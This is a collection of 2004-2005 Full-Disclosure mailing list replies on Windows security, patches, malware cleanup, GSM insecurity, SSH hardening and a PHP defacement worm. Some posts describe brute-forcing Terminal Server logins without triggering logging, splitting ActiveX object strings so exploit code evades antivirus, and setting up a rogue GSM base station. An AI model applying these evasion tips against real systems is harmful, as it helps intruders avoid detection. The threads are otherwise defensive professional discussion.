RE: [Full-Disclosure] Windows Registry Analzyer
Use RegMon for real-time Reg watching and try this product for Snapshot compares. I haven't used it but it looks to be fun and there is a write-up in PCWorld about it. --- Readme file of Regshot 1.61 2002/03/30 --- Please view whatsnew.txt for update info! - Package includes: - regshot.exe,language.ini,readme.txt,whatsnew.txt - Introduction: - RegShot is a small registry compare utility that allows you to quickly take a snapshot of your registry and then compare it with a second one - done after doing system changes or installing a new software product. The changes report can be produced in text or HTML format and contains a list of all modifications that have taken place between snapshot1 and snapshot2.In addition, you can also specify folders (with sub filders) to be scanned for changes as well.In version 1.60+ you can save your whole registry in a *.hiv file for future use. Note: Regshot is a FREEWARE! http://regshot.yeah.net/ PCWorld Page - http://www.pcworld.com/downloads/file_description/0,fid,19540,00.asp -Todd -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Frank Knobbe Sent: Thursday, March 03, 2005 11:54 AM To: Danny Cc: Full-Disclosure (E-mail) Subject: Re: [Full-Disclosure] Windows Registry Analzyer On Thu, 2005-03-03 at 10:35 -0500, Danny wrote: Anyone know of any free tools to analyze what changes have been made to a Windows 2000/XP registry? There used to be a company/product called Intact, which provided change monitoring of Registry settings as part of its HIDS offerings. I'm not sure if they are still around or got bought. Unfortunately it's not a free tool though. Regards, Frank ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] hushmail.com, is this true?
I have to agree with James, If you are using Hushmail's free e-mail service and expecting that to hide you from the government, then you are in trouble. Mine as well keep e-mailing from your yahoo address anyways. You must assume all things log your IP address, even anon proxies. Which most do...but don't give your IP to the next computer. But tracing you is still possible, if the government in that region wanted to find you...they could. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of james edwards Sent: Tuesday, January 25, 2005 3:51 PM To: full-disclosure@lists.netsys.com Subject: Re: [Full-Disclosure] hushmail.com, is this true? Thank you Valdis, you were spot on. I'm sorry, I must have been misunderstood, my main concern IS a blunt legal object being used against hushmail to find my identity. No business can ignore a judges orders to produce whatever required information. The business can contest the request but if it is proven out the information must be produced. If you are really concerned about your privacy, and not just wasting our time, then never assume or expect another to protect your privacy. There are many techniques out there to remain anonymous. Any system that relies on just one free service to ensure privacy is useless. j ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [lists] [Full-Disclosure] Terminal Server vulnerabilities
I agree, renamed the Admin account and create a fake Admin account, put very good logging on it. Because any attempts on this account would be attacks. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Steve Tornio Sent: Tuesday, January 25, 2005 3:29 PM To: full-disclosure@lists.netsys.com Subject: Re: [lists] [Full-Disclosure] Terminal Server vulnerabilities On Jan 25, 2005, at 2:38 PM, Curt Purdy wrote: Daniel Sichel wrote: snip Naturally I don't like this answer because of horror stories I have heard about Terminal server. They claim there are no unfixed vulnerabilities to Terminal Server on Windows Server 2000 Service Pack 4. The problem with terminal server is not any vulnerablities that can be exploited, but the fact that administrator can be bruteforced (6 attempts followed by reconnect) and that it is screaming its existence on port 3889. If you use it, definitely change the port in the registry. Of course, one of the very first things you should do on a Windows box is rename the administrator account, so this kind of blind brute-forcing is not possible. Also, the problem you describe can be exacerbated in that administrator can be brute-forced without creating a log entry, by attempting 5 logons and disconnecting before Windows disconnects and logs after the sixth failure. This was covered in a talk at Black Hat 2003, when Ryan Russell and Tim Mullens released TSGrinder. I don't know if they continued work on it. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] FW: MS Antispyware makes deal to leave Weatherbug alone
And the money payoff begins.. -Original Message- From: jaynine [mailto:[EMAIL PROTECTED] Sent: Tuesday, January 11, 2005 6:48 AM To: Patch Management Mailing List Subject: MS Antispyware makes deal to leave Weatherbug alone I read this rather disturbing article on another tech list. Pardon me if someone here has already made reference to it. --- j9 http://netrn.net/spywareblog/archives/2005/01/07/adware-vs-microsoft/ 1/7/2005 Adware vs. Microsoft It's started folks. WeatherBug Miffed at Microsoft's Spyware Classification . Microsoft Corp.'s newly released anti-spyware is flagging a component of AWS Convergence Technologies' WeatherBug application as a threat to Windows users, prompting an immediate complaint from the Gaithersburg, Md.-based company. It appears this dispute has been resolved already: A Microsoft spokeswoman said the beta product included a vendor dispute-resolution mechanism to deal with complaints from third-party companies. In the case of WeatherBug, the dispute-resolution process paid immediate dividends. On Friday, the company received a response from Microsoft with the good news that the current signatures for Minibug will be removed. --- To unsubscribe send a blank email to [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] FW: New Security Patches from Microsoft
No IE patch, it would seem. -Original Message- From: Eric Schultze [mailto:[EMAIL PROTECTED] Sent: Tuesday, January 11, 2005 12:09 PM To: Patch Management Mailing List Subject: New Security Patches from Microsoft Three new security bulletins have been released MS05-001 (Critical)Vulnerability in the Indexing Service Could Allow Remote Code Execution (871250) Vulnerability in HTML Help Could Allow Code Execution (890175) http://www.microsoft.com/technet/security/Bulletin/MS05-001.mspx MS05-002 (Critical) Vulnerability in Cursor and Icon Format Handling Could Allow Remote Code Execution (891711) http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx MS05-003 (Important) Vulnerability in the Indexing Service Could Allow Remote Code Execution (871250) http://www.microsoft.com/technet/security/Bulletin/MS05-003.mspx Happy Testing Eric --- To unsubscribe send a blank email to [EMAIL PROTECTED] --- To unsubscribe send a blank email to [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] FW: New Security Patches from Microsoft
Agreed, I spoke a bit too fast. Peter Kruse e-mail me directly and stated the same. Thanks for pointing that out. -Original Message- From: Larry Seltzer [mailto:[EMAIL PROTECTED] Sent: Tuesday, January 11, 2005 2:04 PM To: Todd Towles; 'Mailing List - Full-Disclosure' Subject: RE: [Full-Disclosure] FW: New Security Patches from Microsoft No IE patch, it would seem. No, but... MS05-001 (Critical)Vulnerability in the Indexing Service Could Allow Remote Code Execution (871250) Vulnerability in HTML Help Could Allow Code Execution (890175) http://www.microsoft.com/technet/security/Bulletin/MS05-001.mspx MS05-002 (Critical) Vulnerability in Cursor and Icon Format Handling Could Allow Remote Code Execution (891711) http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx Both of these address problems that have been exploited through IE. These are the ones that have gotten so much recent publicity. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] And you're proud of this Mike Evanchick?
Sounds like you need AV and a bit of network security. If you are scared of IRC trojans and detectable viruses..then your time would be better spent putting those systems into place. Don't you think? From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Elle ChickaSent: Monday, December 27, 2004 11:16 PMTo: full-disclosure@lists.netsys.comSubject: [Full-Disclosure] And you're proud of this Mike Evanchick? You so proudly posted this: http://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.htmlmikewww.michaelevanchik.com Obviously you are just tickled to see that the kiddies were able to so quickly turn your point/click sploit code into a virus to wreak havoc on my network. Thanks a lot for helping to make all of us a little less secure over the holiday's. __Do You Yahoo!?Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] And you're proud of this Mike Evanchick?
Umm..and you were the one giving cheers to Norton. Of course AV
can be fooled..and of course a patch from microsoft is the only true way to fix
the problem.
She
was attacking you for giving Cheers to Norton. I didn't release the POC, you
did. I am happy Norton is detecting it. If you want to change your words right
in the middle of the sentence, I really don't care.
By
attacking me on a personal level, you have proven to me..to be unprofessional at
best.
From: Michael Evanchik
[mailto:[EMAIL PROTECTED] Sent: Wednesday, December 29,
2004 5:03 PMTo: Todd Towles; Elle Chicka;
full-disclosure@lists.netsys.comSubject: Re: [Full-Disclosure] And
you're proud of this Mike Evanchick?
Todd,
Listen,you are so wrong i cant belive you
even have the guts to post this. How stupid can you be? Norton or
any AVP can easily be fooled. The active x object "ca"+n b"+ +e crea"
+ted" like this.code changed around , or even different local code can
be used and tada AVP is fooled. Only a true patch from microsoft or
disable the help control in the registry is going to stop this. Her
concern is wise.
Mike
www.michaelevanchik.com
- Original Message -----
From:
Todd Towles
To: Elle Chicka ; full-disclosure@lists.netsys.com
Sent: Wednesday, December 29, 2004 9:36
AM
Subject: RE: [Full-Disclosure] And
you're proud of this Mike Evanchick?
Well, if you have Norton, it couldn't wreak havoc...now could
it? Most of the AV compaines are now detecting the exploit. This detection
response is much faster than most of the other exploits which are wreaking
havoc on your network, so it would sound.
Nice work to Norton.
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Elle
ChickaSent: Monday, December 27, 2004 11:16 PMTo:
full-disclosure@lists.netsys.comSubject: [Full-Disclosure] And
you're proud of this Mike Evanchick?
You so proudly posted this:
http://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.htmlmikewww.michaelevanchik.com
Obviously you are just tickled to see that the kiddies were able to
so quickly turn your point/click sploit code into a virus to wreak havoc
on my network.
Thanks a lot for helping to make all of us a little less secure over
the holiday's.
__Do You
Yahoo!?Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] And you're proud of this Mike Evanchick?
Well, if you have Norton, it couldn't wreak havoc...now could it? Most of the AV compaines are now detecting the exploit. This detection response is much faster than most of the other exploits which are wreaking havoc on your network, so it would sound. Nice work to Norton. From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Elle ChickaSent: Monday, December 27, 2004 11:16 PMTo: full-disclosure@lists.netsys.comSubject: [Full-Disclosure] And you're proud of this Mike Evanchick? You so proudly posted this: http://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.htmlmikewww.michaelevanchik.com Obviously you are just tickled to see that the kiddies were able to so quickly turn your point/click sploit code into a virus to wreak havoc on my network. Thanks a lot for helping to make all of us a little less secure over the holiday's. __Do You Yahoo!?Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] List of worm and trojan files
GuidoZ is correct. I have seen companies ship new PCs out to customers because of very bad infections and spyware...but of course they don't patch them with anything. (Not even the LSASS holes)...so in two weeks you have the same mess. I look at it and see Sasser, SD-Bot and I know want you have to do to stop it. A huge corporation can't do the same? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of GuidoZ Sent: Tuesday, December 28, 2004 3:17 PM To: Kevin Cc: Carilda A Thomas; full-disclosure@lists.netsys.com Subject: Re: [Full-Disclosure] List of worm and trojan files Assuming the attacker is competent, the only way to clean a deeply compromised machine is to reformat the drive and start from scratch. The truly paranoid will question whether just formatting the drive is sufficient. This isn't necessarily the case. While it will get the system up and going again (and clean for the moment), if you don't do any root cause analysis, then the problem will likely just return. You need to do some investigating and figure out WHAT the problem is and HOW it got there. Otherwise you haven't fixed anything. This goes for any incident. Spyware/Adware/virus/trojan/worm or your fav malware... they all have to get onto the system somehow. Without knowing how and just reformatting, how have you fixed the actual issue at hand? One of the definitions of insanity: Doing the same thing and expecting a different result. Therefore, it's certifiably insane to reload the system (to the previous state) and expect it to not be reinfected. =) -- Peace. ~G On Thu, 23 Dec 2004 23:03:39 -0600, Kevin [EMAIL PROTECTED] wrote: Carilda A Thomas [EMAIL PROTECTED] wrote: I have been looking but I cannot find a list all in one place of the various illegitimate files that various worms and trojans install into Microsoft systems. What'd really help here is a list of MD5 checks for known bad binaries. Obviously a custom build of sdbot or just a simple hexedit would defeat this, but such a list would still have value against automated attacks, etc. Perhaps I should clarify about this list thing: A friend of mine is apparently running a rogue email server and a rogue ftp server, and none of the virus checkers we have tried will determine what program or where. I looked for a windows equivalent to lsof but there doesn't appear to be one - Sysinternals has applications that, taken in combination, do much of what 'lsof' does under Unix. Specifically, tcpview (http://www.sysinternals.com/ntw2k/source/tcpview.shtml) will show you any listening sockets, the associated process, and the location from which the process launched. This should suffice to locate a rogue FTP service on a Windows PC. the one I found can only determine the program if it sees a packet go by and cannot find a quiescent program. The A/V checkers do not flag an email server, considering it a legitimate program. Task manager is also destroyed, so there is no help there. I was hoping to find a list of illegitimate files for which I could check. Assuming the attacker is competent, the only way to clean a deeply compromised machine is to reformat the drive and start from scratch. The truly paranoid will question whether just formatting the drive is sufficient. Kevin Kadow ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Insecurity in Finnish parlament (computers)
The NSA has bigger fish to worry about than Finland. =) Sorry -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Markus Jansson Sent: Sunday, December 26, 2004 10:17 AM To: James Tucker Cc: full-disclosure@lists.netsys.com Subject: Re: [Full-Disclosure] Insecurity in Finnish parlament (computers) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Sun, 26 Dec 2004 06:34:24 -0800 James Tucker [EMAIL PROTECTED] wrote: The only charge appropriate for this case would be what is informally known as a 'gag order' and will require that you disprove under a court of law all statements made by Mr Jansson. In fact, you will have to prove that Mr Jansson's comments are causing you loss of revenue or damaging the overall reputation of your organisation through false claims. Heh, I dont believe there are such laws here in Finland. If we where talking about private enterprise or individual person, it would be possible if its clear that Im lying and causing great damage. Items 1 to 9 on the list would suggest physical access to a device, this is likely to have been contradictory to law. Perhaps, if you think that *I* got access by using illegal means. Then, ofcourse, someone would have to prove that and if they dont, well... It is also possible, that he has had only limited access to one particular device, this would not be conclusive and may not be a true representation of the state of affairs of all devices owned by the Finnish government. It is unlikely that all the computers have the same security holes for many reason, but I have gotten confirmations from several computers/users that atleast most of the issues I have described exist in most, if not all, computers. Item 10 negates the likelihood of physical access, this would contradict the above and would seem to make the story inconsistent. Maybe I didnt (if I did infact myself) have means to access everything in those computers... ;) Item 12 describes a well known problem, however this cannot be fixed by the users of the system. Oh yes, they could and should move from TeliaSonera to Elisa for example, that uses secure COMP-128-3 and A5/3. Its been years and years since this security hole was shown first so they have had plenty of time, but they just dont give a drek (both in TeliaSonera and in our parlament). Furthermore item 12 describes a scenario which simply is not realistic. Whilst the encryption algorithms in use may be crackable in near real time on a modern computer, A5/1 is crackable IN REAL TIME. http://www.gsm-security.net/faq/gsm-a3-a8-comp128-broken- security.shtml http://cryptome.org/gsm-crack-bbk.pdf http://www.gsm-security.net/faq/gsm-a5-broken-security.shtml dissection of the modulation scheme and isolation of a single device is most certainly NOT possible with a single laptop. Ofcourse you need few additional tools for that, but the point is, that the security of the system is broken. Most likely there are no civilians in Finland with the resources to actually carry out the attack described. Some civilians do have. However, Finnish people are so uninterested in politics that they really would bother. ;) But other goverments and intelligence agencies would surely be interested and willing to wiretap and listen. Item 13 has more implications than have been considered and would require more than a little insider knowledge to pull off the attack. Perhaps. The issue is, that it can be done and they should protect themselfes against it. In terms of civilian liability this method of attack is absolutely absurd. It would require co-ordination from several places and a significant knowledge of existing infrastructure surrounding that geographical location. That sort of information is easily obtained. No co-ordination is really required, just put up a false GSM base station next to our parlament building with a strong enought signal and voila! Such hard work is rarely necessary, as it would make more sense to just knock out the government worker and steal their laptop With a good getaway plan this would take far less time, and not cost hundreds of thousands of dollars. True, that attack is more potential especially since the laptop HDD:s are not encrypted (as they should). We are discussing government security here, but if there is something occurring that would concern the NSA or MI5/6 then encrypting your GSM comms will be the least of your security concerns. I was under the impression that NSA etc. spy for their living anything they can. I bet members of parlaments and their assistants are very good targets. Firstly it would appear that Mark is a common sensationalist. Argumentum ad hominem. Red herring. Having taken part in quite unscientific objections with members of
RE: [Full-Disclosure] Finnish perlament !?!?!
Title: Message Well, there are some several still with FD - As Len stated last week, things aren't 100% yet ..don' t be too hard on him...lol From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Leeuwen, Allan vanSent: Friday, December 24, 2004 2:01 AMTo: full-disclosure@lists.netsys.comSubject: [Full-Disclosure] Finnish perlament !?!?! Ok Ok, we got the message ... Mr Jansson has sent the information about your insecure environment to a lot of places ... Personally I only received HIS email 1 time and YOURS about 5 times (I havn't checked my other lists yet). So stop sending your threat email immediatelly or I will sue you for spamming. Allan ===De informatie opgenomen in dit bericht kan vertrouwelijk zijn en is alleen bestemd voor de geadresseerde. Indien u dit bericht onterecht ontvangt, wordt u verzocht de inhoud niet te gebruiken en de afzender direct te informeren door het bericht te retourneren. Hoewel Orange maatregelen heeft genomen om virussen in deze email of attachments te voorkomen, dient u ook zelf na te gaan of virussen aanwezig zijn aangezien Orange niet aansprakelijk is voor computervirussen die veroorzaakt zijn door deze email.The information contained in this message may be confidential and is intended to be only for the addressee. Should you receive this message unintentionally, please do not use the contents herein and notify the sender immediately by return e-mail. Although Orange has taken steps to ensure that this email and attachments are free from any virus, you do need to verify the possibility of their existence as Orange can take no responsibility for any computer virus which might be transferred by way of this email.=== ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Shoe 1.0 - Remote Lace Overflow
Very funny, nice work. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Wednesday, December 22, 2004 10:21 AM To: bugtraq@securityfocus.com; [EMAIL PROTECTED]; full-disclosure@lists.netsys.com Subject: [Full-Disclosure] Shoe 1.0 - Remote Lace Overflow Shoe 1.0 - Remote Lace Overflow This Vulnerability is in reference to the new class of remote vulnerabilities indicated in: http://www.securityfocus.com/archive/1/385078/2004-12-19/2004-12-25/2 [Please read that first] Discovery Credited To: -- freshman - 0x90.org wxs - 0x90.org txs - 0x90.org Greets: --- Jonathan T. Rockway for being the smartest man alive. Description: A remote shoe vulnerability exists that could allow for remote tripping and possible exposure of sensitive data to the pavement. Scope: -- REMOTE Severity: - Hyper-Critical. This needs no explanation. Vulnerability: -- Failure to properly tie your shoe could result in tripping and a possible broken face upon sudden deceleration when hitting the pavement. Vulnerable Sizes: - 6 through 13. Other sizes may be vulnerable, but were unavailable for testing. Exploitation: - You have a 100% secure walking system - you do not fall down, or trip over your own laces. A remote attacker could determine your shoe size by reading your livejournal FROM THE NETWORK and could MAIL YOU a shoe with extra long laces. You put the shoe on without tying it properly and suddenly are exposed to a REMOTE shoe vulnerability! Fix: Do not wear untrusted shoes sent to you. Other possible workarounds include sandals (aka. flip-flops). These are a good work-around and are widely available for those concerned about their security. Vendor Notification: Vendors were not notified at the time of this writing. We have choosen not to give advance notice because the fault is not always with the vendor of the shoe as a REMOTE PERSON could SNAIL MAIL a LOCAL USER a vulnerable shoe. We at 0x90.org believe that the users should be happy they were notified about this. Imagine the mass destruction and chaos that would ensue if we unleashed a REMOTE SHOE VULNERABILITY WORM into the wild. At this time we have choosen not to do that, mostly because we can not afford all the stamps to mail vulnerable shoes to the public. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] OpenSSH is a good choice?
I would believe Security through obscurity is bad but Obscurity in Security is good. As long as it is a step in your layered defense stand, obscurity is ok, but don't relay on it for everything. Which is good advice for everything anyways. Hide your port but take active steps to secure SSH deeper, disable V1, use only strong cipher...make obscurity part of your security plan but not the only step in the plan. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Willem Koenings Sent: Tuesday, December 21, 2004 4:37 PM To: full-disclosure@lists.netsys.com Subject: Re: [Full-Disclosure] OpenSSH is a good choice? on Tue Dec 21 14:54:44 EST 2004, Ron DuFresne wrote the non std port advice is not worth much, security through obscurity kinda thing. wrong. non standard port helps quite well against automated scans. most targets nowadays are searched via automated scans. if you are painted red, you get attention. this is first step - stay gray. but if you are already set up as a target, this would not help you. this helps you NOT getting up as target for someone, who just searching some servers for fun - scriptkiddies. W. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] [USN-45-1] nasm vulnerability
So now, I just need to trick a user into running a malicious source file that I assembed and sent him, this makes it much harder. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Martin Pitt Sent: Wednesday, December 22, 2004 4:53 AM To: [EMAIL PROTECTED] Cc: bugtraq@securityfocus.com; full-disclosure@lists.netsys.com Subject: [Full-Disclosure] [USN-45-1] nasm vulnerability === Ubuntu Security Notice USN-45-1 December 22, 2004 nasm vulnerability CAN-2004-1287 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) The following packages are affected: nasm The problem can be corrected by upgrading the affected package to version 0.98.38-1ubuntu0.1. In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Jonathan Rockway discovered a locally exploitable buffer overflow in the error() function of nasm. If an attacker tricked a user into assembling a malicious source file, they could exploit this to execute arbitrary code with the privileges of the user that runs nasm. Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/nasm/nasm_0.98.3 8-1ubuntu0.1.diff.gz Size/MD5: 9013 69265719926bba4907e7da4df681324d http://security.ubuntu.com/ubuntu/pool/main/n/nasm/nasm_0.98.3 8-1ubuntu0.1.dsc Size/MD5: 598 b160f2ca70fc5bd4021c1e6e526eaf70 http://security.ubuntu.com/ubuntu/pool/main/n/nasm/nasm_0.98.3 8.orig.tar.gz Size/MD5: 641727 9c1df91560651cbfaa73595fe6babb85 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/n/nasm/nasm_0.98.3 8-1ubuntu0.1_amd64.deb Size/MD5: 1586664 2c76de8992b04548754487c9a2aa61dd i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/n/nasm/nasm_0.98.3 8-1ubuntu0.1_i386.deb Size/MD5: 1545538 a9c5d4e5a11f9c0c36a1deb5754eaf68 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/n/nasm/nasm_0.98.3 8-1ubuntu0.1_powerpc.deb Size/MD5: 1584374 540e0c417178d47713ca0cd60b7fc806 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] RE: Cipher Tool
You could setup a tunnel using Stunnel if you didn't want to use SCP/SSH..but all are good ways of passing the file. Don't forget about scripting GPG as well. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Ron DuFresne Sent: Wednesday, December 15, 2004 12:13 PM To: richard capistrano Cc: full-disclosure@lists.netsys.com Subject: Re: [Full-Disclosure] RE: Cipher Tool And the reasons that sending the file through an encrypted tunnel, like scp/ssh is? Thanks, Ron DuFresne On Tue, 14 Dec 2004, richard capistrano wrote: Hello, We are looking for a tool that can actually cipher or hash a particular portion of a file so that it will not display the particular field of a file. This will be applied to the file so that when it travels the network, the confidential field in the file is not displayed in clear text. Due to performance issues, we can not simply hash the whole file. Is there a freeware or software or information, I can check out? Thanks in advance. - Do you Yahoo!? Read only the mail you want - Yahoo! Mail SpamGuard. -- Sometimes you get the blues because your baby leaves you. Sometimes you get'em 'cause she comes back. --B.B. King ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Possible apache2/php 4.3.9 worm
There were several serious holes just released in 4.3.9 of PHP. That is a possible attack vector from what you are saying. Get 4.3.10 of PHP for sure. As far as what this does or what all it would do, someone needs to get a good catch of it. Anyone ready to setup a box? =) -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Alex Schultz Sent: Tuesday, December 21, 2004 9:32 AM To: full-disclosure@lists.netsys.com Cc: [EMAIL PROTECTED] Subject: [Full-Disclosure] Possible apache2/php 4.3.9 worm Some of the sites I administer were alledgedly hit by a worm last night. It overwrote all .php/.html files that were owner writable and owned by apache. The worm put the following html in place of what was there: !DOCTYPE HTML PUBLIC -//IETF//DTD HTML 2.0//EN HTML HEAD TITLEThis site is defaced!!!/TITLE /HEAD BODY bgcolor=#00 text=#FF H1This site is defaced!!!/H1 HR ADDRESSbNeverEverNoSanity WebWorm generation 17./b/ADDRESS /BODY /HTML We were running apache 2.0.52 and php 4.3.9. Have any of you encounted this before? Also is there anything I should be aware of such as a possible binary that may have been dropped? Could this have been accomplised by the upload path traversal vulnerability? Google returns nothing. Thanks -Alex Schultz ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] RE: Cipher Tool
Or you could go buy some of these and link them together to reach over a distance. The First Commercial Quantum Cryptography solution - encryption per photon =) http://www.magiqtech.com/index.php -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of James Tucker Sent: Wednesday, December 15, 2004 10:38 PM To: richard capistrano Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] RE: Cipher Tool Have you considered using secured network protocols on dedicated encryption hardware? or is that beyond the price point? Any cipher algorithm would be theoretically implementable (providing the length of data is suitable). If you are looking for _real_ performance though then ciphering may not be what you want as there isn't any good cipher that is really overly fast fast (deliberate double). There are other core pieces of the puzzle to be considered though, like are you going to be talking in a client less manner (i.e. is the client pre-configured or has the client never received secure comms before?) Is there a socket/tunnel already running? What is the rough length of the data set (impact readability and suitability for encryption algorithms)? What is the performance restriction (i.e. where is the bottleneck)? How secure do you need it, anti-fool, seconds, hours, years or millennial(might actually require more data storage than money can buy)? I raised an eyebrow at the last portion of your mail, Is there a freeware or software or information, I can check out?. This would suggest that you are looking to put another program somewhere mid-flow in a data pipe; thats not always a good option. If you're really looking for speed and ease of implementation then something like a simple rotation cipher might work out for you, but this is going to be so poor a encryption that some cipher pro's could read it in its encrypted form. This is obviously no good if you're worried about credit card info, but is OK if it's just your girlfriend being a nosy ... . On Tue, 14 Dec 2004 00:23:41 -0800 (PST), richard capistrano [EMAIL PROTECTED] wrote: Hello, We are looking for a tool that can actually cipher or hash a particular portion of a file so that it will not display the particular field of a file. This will be applied to the file so that when it travels the network, the confidential field in the file is not displayed in clear text. Due to performance issues, we can not simply hash the whole file. Is there a freeware or software or information, I can check out? Thanks in advance. Do you Yahoo!? Read only the mail you want - Yahoo! Mail SpamGuard. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] A suggestion to all AV vendors...
Not exactly true..it is called freedom...drinking is bad for you when you take too much..but so are some vitamins are bad for you when you take too much...let the government tax cigs, if you don't want to buy the tax, don't buy them. Again we are way OT. Never go to excess, but let moderation be your guide. Cicero (106 BC - 43 BC) Water, taken in moderation, cannot hurt anybody. Mark Twain (1835 - 1910) -Todd -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Kenneth Ng Sent: Tuesday, December 07, 2004 11:34 AM To: [EMAIL PROTECTED] Cc: bipin gautam; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] A suggestion to all AV vendors... If you want an analogy, note that the US government says that smoking is bad for you. Yet, they won't ban smoking. Why? All the revenue they get from taxing cigerettes. On Tue, 07 Dec 2004 10:50:11 -0500, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Mon, 06 Dec 2004 19:29:26 PST, bipin gautam said: A simple yet effective solution would be, for AV vendors to (say) add the vulnerable system dll's, execudables etc... in a threat list (Refering to Microsoft's KB or something similar) And after completing the virus scan, suggest the users to download proper patches accordingly to threat level and directing the end users towards proper link to do so? Simple, effective, and Won't Happen In Our Lifetime. Remember - we're talking about a multi-billion dollar market segment devoted to fixing shortcomings in another company's software. And said segment doesn't want to kill the goose that laid the golden eggs. Repeat after me: Most A/V vendors don't actually give a squat about your security. They are there to sell you products and improve their bottom line, not yours. They don't care about your bottom line as long as your bottom line can still pay their invoices. The A/V vendors have known for several years now exactly how not to send a virus was cleaned from your email by ShinyAV spam, but they keep doing it anyhow, just to get brainshare for ShinyAV. What business case is there for them to give you a pointer to vendor patches that will close some of the holes that let the malware in? (Also, keep in mind that if they don't point you at IE fixes, then when you get 0wned by an IE hole, they can just say Hey, that's not a virus, that's an IE hole, Not Our Problem...) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Official IFRAME patch - make sure it installs correctly
